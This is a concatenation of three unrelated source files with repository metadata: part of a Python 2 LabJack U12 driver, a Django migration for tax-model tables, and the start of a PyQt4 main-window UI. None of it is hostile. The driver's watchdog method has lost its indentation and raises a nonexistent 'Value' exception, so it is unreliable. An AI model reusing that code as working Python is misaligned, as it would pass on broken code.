        return {"idnum":idNum.value, "data":cData}
def watchdog(self, active, timeout, activeDn, stateDn, idNum=None, demo=0, reset=0):
"""
Name: U12.watchdog(active, timeout, activeDn, stateDn, idNum=None, demo=0, reset=0)
Args: See section 4.35 of the User's Guide
Desc: Controls the LabJack watchdog function.
>>> dev = U12()
>>> dev.watchdog(1, 1, [0, 0, 0], [0, 0, 0])
>>> {'idnum': 1}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
if len(activeDn) is not 3: raise ValueError("activeDn must have 3 elements")
if len(stateDn) is not 3: raise Value("stateDn must have 3 elements")
ecode = staticLib.Watchdog(ctypes.byref(idNum), demo, active, timeout, reset, activeDn[0], activeDn[1], activeDn[2], stateDn[0], stateDn[1], stateDn[2])
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value}
    def readMem(self, address, idnum = None):
        """
        Name: U12.readMem(address, idnum=None)
        Args: See section 4.36 of the User's Guide
        Desc: Reads 4 bytes from a specified address in the LabJack's nonvolatile memory

        Returns the bytes most-significant first, mirroring the argument
        order of writeMem.

        >>> dev = U12()
        >>> dev.readMem(0)
        >>> [5, 246, 16, 59]
        """
        if address is None:
            raise Exception, "Must give an Address."

        # Fall back to this device's local id; passed by reference below.
        if idnum is None:
            idnum = self.id

        ljid = ctypes.c_ulong(idnum)
        # Four out-parameters, one per byte at the address (ad3 is the most
        # significant).
        ad0 = ctypes.c_ulong()
        ad1 = ctypes.c_ulong()
        ad2 = ctypes.c_ulong()
        ad3 = ctypes.c_ulong()

        ec = staticLib.ReadMem(ctypes.byref(ljid), ctypes.c_long(address), ctypes.byref(ad3), ctypes.byref(ad2), ctypes.byref(ad1), ctypes.byref(ad0))
        if ec != 0: raise U12Exception(ec)

        # Mask each value to a single byte before returning.
        addr = [0] * 4
        addr[0] = int(ad3.value & 0xff)
        addr[1] = int(ad2.value & 0xff)
        addr[2] = int(ad1.value & 0xff)
        addr[3] = int(ad0.value & 0xff)

        return addr
    def writeMem(self, address, data, idnum=None, unlocked=False):
        """
        Name: U12.writeMem(self, address, data, idnum=None, unlocked=False)
        Args: See section 4.37 of the User's Guide
        Desc: Writes 4 bytes to the LabJack's 8,192 byte nonvolatile memory at a specified address.

        data is a 4-element list, most-significant byte first (the inverse
        of readMem's return value).  Returns the (possibly rewritten) id.

        >>> dev = U12()
        >>> dev.writeMem(0, [5, 246, 16, 59])
        >>> 1
        """
        if address is None or data is None:
            raise Exception, "Must give both an Address and data."
        if type(data) is not list or len(data) != 4:
            raise Exception, "Data must be a list and have a length of 4"

        # Fall back to this device's local id; passed by reference below.
        if idnum is None:
            idnum = self.id

        ljid = ctypes.c_ulong(idnum)
        # Bytes are passed most-significant first; mask each to 8 bits.
        ec = staticLib.WriteMem(ctypes.byref(ljid), int(unlocked), address, data[3] & 0xff, data[2] & 0xff, data[1] & 0xff, data[0] & 0xff)
        if ec != 0: raise U12Exception(ec)

        return ljid.value
    def LJHash(self, hashStr, size):
        """Hash *size* bytes of *hashStr* with the driver's LJHash routine
        and return the 16-byte digest as a string.

        Windows-only: loads ljackuw directly via ctypes.windll.
        Raises U12Exception on a nonzero driver error code.
        """
        outBuff = (ctypes.c_char * 16)()  # 16-byte digest out-buffer
        retBuff = ''

        # NOTE(review): reloads the DLL (shadowing the module-level
        # staticLib in this scope) -- presumably deliberate; confirm.
        staticLib = ctypes.windll.LoadLibrary("ljackuw")

        ec = staticLib.LJHash(ctypes.cast(hashStr, ctypes.POINTER(ctypes.c_char)),
                              size,
                              ctypes.cast(outBuff, ctypes.POINTER(ctypes.c_char)),
                              0)
        if ec != 0: raise U12Exception(ec)

        # Copy the fixed-size ctypes buffer into a Python string.
        for i in range(16):
            retBuff += outBuff[i]

        return retBuff
def isIterable(var):
    """Return True if *var* supports iteration, False otherwise.

    >>> isIterable([1, 2])
    True
    >>> isIterable(7)
    False
    """
    # iter() raises TypeError for non-iterables.  Catching only TypeError
    # (instead of the original bare except) avoids swallowing
    # KeyboardInterrupt/SystemExit and unrelated errors.
    try:
        iter(var)
        return True
    except TypeError:
        return False
def listToCArray(list, dataType):
    """Copy the elements of *list* into a new ctypes array of *dataType*.

    The array length equals len(list).
    """
    cArray = (dataType * len(list))()
    for index, value in enumerate(list):
        cArray[index] = value
    return cArray
def cArrayToList(array):
    """Return a plain Python list containing the elements of *array*."""
    return [element for element in array]
def getErrorString(errorcode):
    """
    Name: U12.getErrorString(errorcode)
    Args: See section 4.19 of the User's Guide
    Desc: Converts a LabJack errorcode, returned by another function, into a string describing the error. No hardware communication is involved.

    >>> dev = U12()
    >>> dev.getErrorString(1)
    >>> Unkown error
    """
    # Bug fix: the DLL writes into this buffer, so it must be a mutable
    # ctypes buffer.  Handing it a c_char_p that points at an immutable
    # (possibly interned) Python string is undefined behaviour.
    errorString = ctypes.create_string_buffer(50)
    staticLib.GetErrorString(errorcode, errorString)
    return errorString.value
def hexWithoutQuotes(l):
    """Format the integers in *l* as a bracketed hex list without quotes.

    >>> hexWithoutQuotes(range(10))
    '[0x0, 0x1, 0x2, 0x3, 0x4, 0x5, 0x6, 0x7, 0x8, 0x9]'
    """
    return "[%s]" % ", ".join(hex(value) for value in l)
"content_hash": "1ecba101c153a518b2059085df247723",
"timestamp": "",
"source": "github",
"line_count": 2982,
"max_line_length": 327,
"avg_line_length": 38.469818913480886,
"alnum_prop": 0.5403383979706582,
"repo_name": "jf87/smap",
"id": "3c16410bee7a6779d94bf38c9a080706615c8ad1",
"size": "114717",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "python/smap/drivers/labjack/labjackpython/u12.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "325117"
},
{
"name": "HTML",
"bytes": "9642"
},
{
"name": "Java",
"bytes": "47918"
},
{
"name": "Lua",
"bytes": "9058"
},
{
"name": "Makefile",
"bytes": "5715"
},
{
"name": "Python",
"bytes": "1704999"
},
{
"name": "R",
"bytes": "23461"
},
{
"name": "Shell",
"bytes": "1273"
},
{
"name": "TeX",
"bytes": "40212"
},
{
"name": "XSLT",
"bytes": "5081"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
import webapp.apps.taxbrain.models
import jsonfield.fields
import django.db.models.deletion
from django.conf import settings
import uuidfield.fields
class Migration(migrations.Migration):
    """Auto-generated Django migration: creates the DynamicBehaviorOutputUrl,
    DynamicBehaviorSaveInputs and DynamicElasticitySaveInputs models and
    links DynamicBehaviorOutputUrl to its inputs and owning user.
    """

    dependencies = [
        ('taxbrain', '0015_auto_20160201_0257'),
        # Depends on whichever model is configured as AUTH_USER_MODEL.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('dynamic', '0007_dynamicsaveinputs_guids'),
    ]

    operations = [
        migrations.CreateModel(
            name='DynamicBehaviorOutputUrl',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('model_pk', models.IntegerField(default=None, null=True)),
                ('uuid', uuidfield.fields.UUIDField(null=True, default=None, editable=False, max_length=32, blank=True, unique=True)),
                ('taxcalc_vers', models.CharField(default=None, max_length=50, null=True, blank=True)),
            ],
        ),
        migrations.CreateModel(
            name='DynamicBehaviorSaveInputs',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                # Behavioral-response parameters stored as comma-separated text.
                ('BE_inc', webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True)),
                ('BE_sub', webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True)),
                ('BE_CG_per', webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True)),
                ('BE_CG_trn', webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True)),
                ('job_ids', webapp.apps.taxbrain.models.SeparatedValuesField(default=None, null=True, blank=True)),
                ('first_year', models.IntegerField(default=None, null=True)),
                ('tax_result', jsonfield.fields.JSONField(default=None, null=True, blank=True)),
                # Fixed placeholder default, not auto_now_add.
                ('creation_date', models.DateTimeField(default=datetime.datetime(2015, 1, 1, 0, 0))),
                # SET_NULL keeps saved inputs when the micro simulation is deleted.
                ('micro_sim', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, blank=True, to='taxbrain.OutputUrl', null=True)),
            ],
            options={
                'permissions': (('view_inputs', 'Allowed to view Taxbrain.'),),
            },
        ),
        migrations.CreateModel(
            name='DynamicElasticitySaveInputs',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('EGDP_amtr', webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True)),
                ('job_ids', webapp.apps.taxbrain.models.SeparatedValuesField(default=None, null=True, blank=True)),
                ('first_year', models.IntegerField(default=None, null=True)),
                ('tax_result', jsonfield.fields.JSONField(default=None, null=True, blank=True)),
                ('creation_date', models.DateTimeField(default=datetime.datetime(2015, 1, 1, 0, 0))),
                ('micro_sim', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, blank=True, to='taxbrain.OutputUrl', null=True)),
            ],
            options={
                'permissions': (('view_inputs', 'Allowed to view Taxbrain.'),),
            },
        ),
        migrations.AddField(
            model_name='dynamicbehavioroutputurl',
            name='unique_inputs',
            field=models.ForeignKey(default=None, to='dynamic.DynamicBehaviorSaveInputs'),
        ),
        migrations.AddField(
            model_name='dynamicbehavioroutputurl',
            name='user',
            field=models.ForeignKey(default=None, to=settings.AUTH_USER_MODEL, null=True),
        ),
    ]
| {
"content_hash": "82a89a224b616b769aa74d216f4f9869",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 143,
"avg_line_length": 53.93150684931507,
"alnum_prop": 0.6217932435864871,
"repo_name": "zrisher/webapp-public",
"id": "23d5ee54cc9a5ec20897f9a10556b1a4e54fd619",
"size": "3961",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "webapp/apps/dynamic/migrations/0008_auto_20160222_1942.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "877372"
},
{
"name": "HTML",
"bytes": "64722"
},
{
"name": "JavaScript",
"bytes": "86106"
},
{
"name": "Python",
"bytes": "406502"
},
{
"name": "Shell",
"bytes": "17"
}
],
"symlink_target": ""
} |
from PyQt4 import QtCore, QtGui
def _fromUtf8(s):
    """Identity fallback used when ``QtCore.QString`` is unavailable
    (PyQt4 API v2 / Qt5-style builds pass plain Python strings through)."""
    return s

try:
    # PyQt4 API v1 exposes QString.fromUtf8; prefer it when present.
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    pass
if hasattr(QtGui.QApplication, "UnicodeUTF8"):
    # PyQt4 API v1: translate() takes an explicit encoding flag.
    _encoding = QtGui.QApplication.UnicodeUTF8

    def _translate(context, text, disambig):
        """Look up *text* in Qt's translation tables (UTF-8 encoding flag)."""
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
else:
    def _translate(context, text, disambig):
        """Look up *text* in Qt's translation tables (no encoding argument)."""
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
    def setupUi(self, MainWindow):
        """Build the complete widget hierarchy of the Bitmessage main window.

        Populates *MainWindow* with a tab widget holding the Inbox, Send,
        Sent, Your Identities, Subscriptions, Address Book,
        Blacklist/Whitelist and Network Status pages, then installs the menu
        bar, status bar, menu actions, signal connections and keyboard tab
        order.

        NOTE(review): this reads like pyuic-generated code (the
        ``_fromUtf8``/``_translate`` shims and naming are the generator's);
        if a ``.ui`` file exists, regenerate instead of hand-editing.
        """
        # --- Top-level window: object name, size, icon, tab shape ---
        MainWindow.setObjectName(_fromUtf8("MainWindow"))
        MainWindow.resize(885, 580)
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/can-icon-24px.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        MainWindow.setWindowIcon(icon)
        MainWindow.setTabShape(QtGui.QTabWidget.Rounded)
        # Central widget: a zero-margin grid layout containing only the tab widget.
        self.centralwidget = QtGui.QWidget(MainWindow)
        self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
        self.gridLayout = QtGui.QGridLayout(self.centralwidget)
        self.gridLayout.setMargin(0)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        self.tabWidget = QtGui.QTabWidget(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
        self.tabWidget.setSizePolicy(sizePolicy)
        self.tabWidget.setMinimumSize(QtCore.QSize(0, 0))
        self.tabWidget.setBaseSize(QtCore.QSize(0, 0))
        font = QtGui.QFont()
        font.setPointSize(9)
        self.tabWidget.setFont(font)
        self.tabWidget.setTabPosition(QtGui.QTabWidget.North)
        self.tabWidget.setTabShape(QtGui.QTabWidget.Rounded)
        self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
        # --- Inbox tab: search row above a vertical splitter
        #     (4-column message table over a read-only preview pane) ---
        self.inbox = QtGui.QWidget()
        self.inbox.setObjectName(_fromUtf8("inbox"))
        self.verticalLayout_2 = QtGui.QVBoxLayout(self.inbox)
        self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
        self.horizontalLayoutSearch = QtGui.QHBoxLayout()
        self.horizontalLayoutSearch.setContentsMargins(-1, 0, -1, -1)
        self.horizontalLayoutSearch.setObjectName(_fromUtf8("horizontalLayoutSearch"))
        self.inboxSearchLineEdit = QtGui.QLineEdit(self.inbox)
        self.inboxSearchLineEdit.setObjectName(_fromUtf8("inboxSearchLineEdit"))
        self.horizontalLayoutSearch.addWidget(self.inboxSearchLineEdit)
        # Combo box items are populated with text in retranslateUi().
        self.inboxSearchOptionCB = QtGui.QComboBox(self.inbox)
        self.inboxSearchOptionCB.setObjectName(_fromUtf8("inboxSearchOptionCB"))
        self.inboxSearchOptionCB.addItem(_fromUtf8(""))
        self.inboxSearchOptionCB.addItem(_fromUtf8(""))
        self.inboxSearchOptionCB.addItem(_fromUtf8(""))
        self.inboxSearchOptionCB.addItem(_fromUtf8(""))
        self.inboxSearchOptionCB.addItem(_fromUtf8(""))
        self.horizontalLayoutSearch.addWidget(self.inboxSearchOptionCB)
        self.verticalLayout_2.addLayout(self.horizontalLayoutSearch)
        self.splitter = QtGui.QSplitter(self.inbox)
        self.splitter.setOrientation(QtCore.Qt.Vertical)
        self.splitter.setObjectName(_fromUtf8("splitter"))
        self.tableWidgetInbox = QtGui.QTableWidget(self.splitter)
        self.tableWidgetInbox.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
        self.tableWidgetInbox.setAlternatingRowColors(True)
        self.tableWidgetInbox.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection)
        self.tableWidgetInbox.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
        self.tableWidgetInbox.setWordWrap(False)
        self.tableWidgetInbox.setObjectName(_fromUtf8("tableWidgetInbox"))
        self.tableWidgetInbox.setColumnCount(4)
        self.tableWidgetInbox.setRowCount(0)
        # Header items get their captions (To/From/Subject/Received) in retranslateUi().
        item = QtGui.QTableWidgetItem()
        self.tableWidgetInbox.setHorizontalHeaderItem(0, item)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetInbox.setHorizontalHeaderItem(1, item)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetInbox.setHorizontalHeaderItem(2, item)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetInbox.setHorizontalHeaderItem(3, item)
        self.tableWidgetInbox.horizontalHeader().setCascadingSectionResizes(True)
        self.tableWidgetInbox.horizontalHeader().setDefaultSectionSize(200)
        self.tableWidgetInbox.horizontalHeader().setHighlightSections(False)
        self.tableWidgetInbox.horizontalHeader().setMinimumSectionSize(27)
        self.tableWidgetInbox.horizontalHeader().setSortIndicatorShown(False)
        self.tableWidgetInbox.horizontalHeader().setStretchLastSection(True)
        self.tableWidgetInbox.verticalHeader().setVisible(False)
        self.tableWidgetInbox.verticalHeader().setDefaultSectionSize(26)
        self.textEditInboxMessage = QtGui.QTextEdit(self.splitter)
        self.textEditInboxMessage.setBaseSize(QtCore.QSize(0, 500))
        self.textEditInboxMessage.setReadOnly(True)
        self.textEditInboxMessage.setObjectName(_fromUtf8("textEditInboxMessage"))
        self.verticalLayout_2.addWidget(self.splitter)
        icon1 = QtGui.QIcon()
        icon1.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/inbox.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.tabWidget.addTab(self.inbox, icon1, _fromUtf8(""))
        # --- Send tab: grid of recipient/subject/message fields, broadcast
        #     toggle, TTL slider and the Send button ---
        self.send = QtGui.QWidget()
        self.send.setObjectName(_fromUtf8("send"))
        self.gridLayout_2 = QtGui.QGridLayout(self.send)
        self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
        self.pushButtonLoadFromAddressBook = QtGui.QPushButton(self.send)
        font = QtGui.QFont()
        font.setPointSize(7)
        self.pushButtonLoadFromAddressBook.setFont(font)
        self.pushButtonLoadFromAddressBook.setObjectName(_fromUtf8("pushButtonLoadFromAddressBook"))
        self.gridLayout_2.addWidget(self.pushButtonLoadFromAddressBook, 3, 2, 1, 1)
        self.label_3 = QtGui.QLabel(self.send)
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.gridLayout_2.addWidget(self.label_3, 4, 0, 1, 1)
        self.pushButtonSend = QtGui.QPushButton(self.send)
        self.pushButtonSend.setObjectName(_fromUtf8("pushButtonSend"))
        self.gridLayout_2.addWidget(self.pushButtonSend, 7, 8, 1, 1)
        self.horizontalSliderTTL = QtGui.QSlider(self.send)
        self.horizontalSliderTTL.setMinimumSize(QtCore.QSize(35, 0))
        self.horizontalSliderTTL.setMaximumSize(QtCore.QSize(70, 16777215))
        self.horizontalSliderTTL.setOrientation(QtCore.Qt.Horizontal)
        self.horizontalSliderTTL.setInvertedAppearance(False)
        self.horizontalSliderTTL.setInvertedControls(False)
        self.horizontalSliderTTL.setObjectName(_fromUtf8("horizontalSliderTTL"))
        self.gridLayout_2.addWidget(self.horizontalSliderTTL, 7, 6, 1, 1)
        spacerItem = QtGui.QSpacerItem(20, 297, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.gridLayout_2.addItem(spacerItem, 6, 0, 1, 1)
        self.comboBoxSendFrom = QtGui.QComboBox(self.send)
        self.comboBoxSendFrom.setMinimumSize(QtCore.QSize(300, 0))
        self.comboBoxSendFrom.setObjectName(_fromUtf8("comboBoxSendFrom"))
        self.gridLayout_2.addWidget(self.comboBoxSendFrom, 2, 1, 1, 1)
        self.labelHumanFriendlyTTLDescription = QtGui.QLabel(self.send)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.labelHumanFriendlyTTLDescription.sizePolicy().hasHeightForWidth())
        self.labelHumanFriendlyTTLDescription.setSizePolicy(sizePolicy)
        self.labelHumanFriendlyTTLDescription.setMinimumSize(QtCore.QSize(45, 0))
        self.labelHumanFriendlyTTLDescription.setMaximumSize(QtCore.QSize(45, 16777215))
        self.labelHumanFriendlyTTLDescription.setObjectName(_fromUtf8("labelHumanFriendlyTTLDescription"))
        self.gridLayout_2.addWidget(self.labelHumanFriendlyTTLDescription, 7, 7, 1, 1)
        self.label_4 = QtGui.QLabel(self.send)
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.gridLayout_2.addWidget(self.label_4, 5, 0, 1, 1)
        self.label = QtGui.QLabel(self.send)
        self.label.setObjectName(_fromUtf8("label"))
        self.gridLayout_2.addWidget(self.label, 3, 0, 1, 1)
        # "Specific recipients" is the default send mode (checked here).
        self.radioButtonSpecific = QtGui.QRadioButton(self.send)
        self.radioButtonSpecific.setChecked(True)
        self.radioButtonSpecific.setObjectName(_fromUtf8("radioButtonSpecific"))
        self.gridLayout_2.addWidget(self.radioButtonSpecific, 0, 1, 1, 1)
        self.labelSendBroadcastWarning = QtGui.QLabel(self.send)
        self.labelSendBroadcastWarning.setEnabled(True)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Ignored, QtGui.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.labelSendBroadcastWarning.sizePolicy().hasHeightForWidth())
        self.labelSendBroadcastWarning.setSizePolicy(sizePolicy)
        self.labelSendBroadcastWarning.setIndent(-1)
        self.labelSendBroadcastWarning.setObjectName(_fromUtf8("labelSendBroadcastWarning"))
        self.gridLayout_2.addWidget(self.labelSendBroadcastWarning, 7, 1, 1, 4)
        self.radioButtonBroadcast = QtGui.QRadioButton(self.send)
        self.radioButtonBroadcast.setObjectName(_fromUtf8("radioButtonBroadcast"))
        self.gridLayout_2.addWidget(self.radioButtonBroadcast, 1, 1, 1, 2)
        # Flat, blue, underlined button styled to look like a hyperlink (TTL help).
        self.pushButtonTTL = QtGui.QPushButton(self.send)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.pushButtonTTL.sizePolicy().hasHeightForWidth())
        self.pushButtonTTL.setSizePolicy(sizePolicy)
        self.pushButtonTTL.setMaximumSize(QtCore.QSize(32, 16777215))
        palette = QtGui.QPalette()
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
        self.pushButtonTTL.setPalette(palette)
        font = QtGui.QFont()
        font.setUnderline(True)
        self.pushButtonTTL.setFont(font)
        self.pushButtonTTL.setFlat(True)
        self.pushButtonTTL.setObjectName(_fromUtf8("pushButtonTTL"))
        self.gridLayout_2.addWidget(self.pushButtonTTL, 7, 5, 1, 1)
        self.label_2 = QtGui.QLabel(self.send)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.gridLayout_2.addWidget(self.label_2, 2, 0, 1, 1)
        self.lineEditTo = QtGui.QLineEdit(self.send)
        self.lineEditTo.setObjectName(_fromUtf8("lineEditTo"))
        self.gridLayout_2.addWidget(self.lineEditTo, 3, 1, 1, 1)
        self.textEditMessage = QtGui.QTextEdit(self.send)
        self.textEditMessage.setObjectName(_fromUtf8("textEditMessage"))
        self.gridLayout_2.addWidget(self.textEditMessage, 5, 1, 2, 8)
        self.pushButtonFetchNamecoinID = QtGui.QPushButton(self.send)
        font = QtGui.QFont()
        font.setPointSize(7)
        self.pushButtonFetchNamecoinID.setFont(font)
        self.pushButtonFetchNamecoinID.setObjectName(_fromUtf8("pushButtonFetchNamecoinID"))
        self.gridLayout_2.addWidget(self.pushButtonFetchNamecoinID, 3, 3, 1, 1)
        self.labelFrom = QtGui.QLabel(self.send)
        self.labelFrom.setText(_fromUtf8(""))
        self.labelFrom.setObjectName(_fromUtf8("labelFrom"))
        self.gridLayout_2.addWidget(self.labelFrom, 2, 2, 1, 7)
        self.lineEditSubject = QtGui.QLineEdit(self.send)
        self.lineEditSubject.setText(_fromUtf8(""))
        self.lineEditSubject.setObjectName(_fromUtf8("lineEditSubject"))
        self.gridLayout_2.addWidget(self.lineEditSubject, 4, 1, 1, 8)
        icon2 = QtGui.QIcon()
        icon2.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/send.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.tabWidget.addTab(self.send, icon2, _fromUtf8(""))
        # --- Sent tab: mirrors the Inbox layout (search row, table, preview) ---
        self.sent = QtGui.QWidget()
        self.sent.setObjectName(_fromUtf8("sent"))
        self.verticalLayout = QtGui.QVBoxLayout(self.sent)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        self.horizontalLayout = QtGui.QHBoxLayout()
        self.horizontalLayout.setContentsMargins(-1, 0, -1, -1)
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.sentSearchLineEdit = QtGui.QLineEdit(self.sent)
        self.sentSearchLineEdit.setObjectName(_fromUtf8("sentSearchLineEdit"))
        self.horizontalLayout.addWidget(self.sentSearchLineEdit)
        self.sentSearchOptionCB = QtGui.QComboBox(self.sent)
        self.sentSearchOptionCB.setObjectName(_fromUtf8("sentSearchOptionCB"))
        self.sentSearchOptionCB.addItem(_fromUtf8(""))
        self.sentSearchOptionCB.addItem(_fromUtf8(""))
        self.sentSearchOptionCB.addItem(_fromUtf8(""))
        self.sentSearchOptionCB.addItem(_fromUtf8(""))
        self.sentSearchOptionCB.addItem(_fromUtf8(""))
        self.horizontalLayout.addWidget(self.sentSearchOptionCB)
        self.verticalLayout.addLayout(self.horizontalLayout)
        self.splitter_2 = QtGui.QSplitter(self.sent)
        self.splitter_2.setOrientation(QtCore.Qt.Vertical)
        self.splitter_2.setObjectName(_fromUtf8("splitter_2"))
        self.tableWidgetSent = QtGui.QTableWidget(self.splitter_2)
        self.tableWidgetSent.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
        self.tableWidgetSent.setDragDropMode(QtGui.QAbstractItemView.DragDrop)
        self.tableWidgetSent.setAlternatingRowColors(True)
        self.tableWidgetSent.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection)
        self.tableWidgetSent.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
        self.tableWidgetSent.setWordWrap(False)
        self.tableWidgetSent.setObjectName(_fromUtf8("tableWidgetSent"))
        self.tableWidgetSent.setColumnCount(4)
        self.tableWidgetSent.setRowCount(0)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetSent.setHorizontalHeaderItem(0, item)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetSent.setHorizontalHeaderItem(1, item)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetSent.setHorizontalHeaderItem(2, item)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetSent.setHorizontalHeaderItem(3, item)
        self.tableWidgetSent.horizontalHeader().setCascadingSectionResizes(True)
        self.tableWidgetSent.horizontalHeader().setDefaultSectionSize(130)
        self.tableWidgetSent.horizontalHeader().setHighlightSections(False)
        self.tableWidgetSent.horizontalHeader().setSortIndicatorShown(False)
        self.tableWidgetSent.horizontalHeader().setStretchLastSection(True)
        self.tableWidgetSent.verticalHeader().setVisible(False)
        self.tableWidgetSent.verticalHeader().setStretchLastSection(False)
        self.textEditSentMessage = QtGui.QTextEdit(self.splitter_2)
        self.textEditSentMessage.setReadOnly(True)
        self.textEditSentMessage.setObjectName(_fromUtf8("textEditSentMessage"))
        self.verticalLayout.addWidget(self.splitter_2)
        icon3 = QtGui.QIcon()
        icon3.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/sent.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.tabWidget.addTab(self.sent, icon3, _fromUtf8(""))
        # --- Your Identities tab: "New Address" button above a 3-column table ---
        self.youridentities = QtGui.QWidget()
        self.youridentities.setObjectName(_fromUtf8("youridentities"))
        self.gridLayout_3 = QtGui.QGridLayout(self.youridentities)
        self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
        self.pushButtonNewAddress = QtGui.QPushButton(self.youridentities)
        self.pushButtonNewAddress.setObjectName(_fromUtf8("pushButtonNewAddress"))
        self.gridLayout_3.addWidget(self.pushButtonNewAddress, 0, 0, 1, 1)
        spacerItem1 = QtGui.QSpacerItem(689, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.gridLayout_3.addItem(spacerItem1, 0, 1, 1, 1)
        self.tableWidgetYourIdentities = QtGui.QTableWidget(self.youridentities)
        self.tableWidgetYourIdentities.setFrameShadow(QtGui.QFrame.Sunken)
        self.tableWidgetYourIdentities.setLineWidth(1)
        self.tableWidgetYourIdentities.setAlternatingRowColors(True)
        self.tableWidgetYourIdentities.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)
        self.tableWidgetYourIdentities.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
        self.tableWidgetYourIdentities.setObjectName(_fromUtf8("tableWidgetYourIdentities"))
        self.tableWidgetYourIdentities.setColumnCount(3)
        self.tableWidgetYourIdentities.setRowCount(0)
        item = QtGui.QTableWidgetItem()
        font = QtGui.QFont()
        font.setKerning(True)
        item.setFont(font)
        self.tableWidgetYourIdentities.setHorizontalHeaderItem(0, item)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetYourIdentities.setHorizontalHeaderItem(1, item)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetYourIdentities.setHorizontalHeaderItem(2, item)
        self.tableWidgetYourIdentities.horizontalHeader().setCascadingSectionResizes(True)
        self.tableWidgetYourIdentities.horizontalHeader().setDefaultSectionSize(346)
